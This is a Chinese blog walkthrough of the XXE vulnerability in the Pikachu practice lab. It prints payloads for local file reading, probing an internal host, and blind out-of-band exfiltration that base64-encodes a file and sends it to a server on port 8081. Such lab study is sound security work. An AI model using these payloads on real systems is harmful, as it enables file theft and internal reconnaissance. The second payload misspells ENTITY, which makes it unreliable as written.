Pikachu靶场之XXE漏洞


一、XML和XXE的区别

XML是传递数据的一种格式,而XXE是XML传递数据过程中产生的一种漏洞,两者是完全不同的

二、解题

1.1 前提

  • 靶场地址:http://192.168.93.134/pikachu/vul/xxe/xxe.php
  • 靶机操作系统:Windows10

如下是文件地址:

在这里插入图片描述

1.2 使用代码进行文件读取

  1. 前提:

    对接收到的数据进行输出显示:

    在这里插入图片描述

  2. POC

    如下POC是固定格式,只需要更改文件地址就可以读取不同的文件

    <?xml version = "1.0"?>
    <!DOCTYPE ANY [
    		<!ENTITY xxe SYSTEM "file:///c://1.txt">
    ]>
    <x>&xxe;</x>
    

    在这里插入图片描述

1.3 内网探针或攻击内网应用

  1. 前提:

    地址文件必须正确:

  2. POC

    	<?xml version = "1.0" encoding="UTF-8"?>
    <!DOCTYPE foo [
    <!ELEMENT foo ANY >
    <!ENTYTY rabbit SYSTEM "http://192.168.93.134:80/pikachu/vul/xxe/xxe.php">
    ]>
    <x>&rabbit;</x>
    

    上面的ip地址假设就是内网的一台服务器的ip地址。还可以进行一个端口扫描,看一下端口是否开放。

1.4 RCE

需要引入外部实体,一般遇不到

1.5 无回显读取文件

POC代码

<?xml version = "1.0"?>
<!DOCTYPE test [
		<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=d:/test.txt">
		<!ENTITY % dtd SYSTEM "http://192.168.93.134:8081/test.dtd">
		%dtd;
		%send;
]>

www目录下文件:

<!ENTITY % payload
	"<!ENTITY &#x25; send SYSTEM
'http://192.168.93.134:8081/?data=%file;'>"
>
%payload;

1.6 xxe绕过

xxe绕过

  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

安全天天学

你的鼓励是对我最大的鼓励

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值